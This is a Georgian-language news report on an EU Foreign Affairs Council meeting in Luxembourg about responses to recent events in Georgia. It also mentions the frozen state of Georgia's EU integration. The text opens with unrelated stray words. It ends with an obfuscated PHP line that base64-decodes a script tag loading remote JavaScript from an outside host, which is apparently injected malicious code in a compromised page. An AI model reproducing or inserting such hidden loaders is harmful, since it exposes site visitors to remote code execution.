celsiusi
ავერსი შნაიდერი

 დღეს, ევროკავშირი საქართველოში ბოლო დროს განვითარებული მოვლენების საპასუხო ზომებთან დაკავშირებით, საგარეო საქმეთა მინისტრების დონეზე, მსჯელობას იწყებს.

ლუქსემბურგში ევროკავშირის საგარეო საქმეთა საბჭო გაიმართება, რომლის დღის წესრიგშიც ერთ-ერთი საკითხი საქართველოა. საგარეო საქმეთა მინისტრები ქვეყანაში ბოლო დროს განვითარებულ მოვლენებს განიხილავენ.

დღის წესრიგით ასევე გათვალისწინებულია მსჯელობა უკრაინის წინააღმდეგ რუსეთის აგრესიაზე, ახლო აღმოსავლეთში არსებულ ვითარებასა და დასავლეთ ბალკანეთთან დაკავშირებულ საკითხებზე.

ასევე მიმდინარე კვირაშია დაგეგმილი საქართველოს შესახებ განხილვა ევროკავშირის პრეზიდენტებისა და პრემიერ-მინისტრების დონეზე. როგორც ევროკავშირის ელჩმა საქართველოში, პაველ ჰერჩინსკიმ გასულ კვირას მედიასთან განაცხადა, ყველა ზომა განიხილება, საბოლოო გადაწყვეტილებას კი წევრი ქვეყნები მიიღებენ. მან სინანული გამოთქვა, რომ საქართველოს ევროკავშირში ინტეგრაციის პროცესი პრაქტიკულად გაყინულია. ამასთან, როგორც ცნობილია, უკრაინის და მოლდოვის EU-ში გაწევრიანების მოლაპარაკებები 25 ივნისს დაიწყება.

143
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");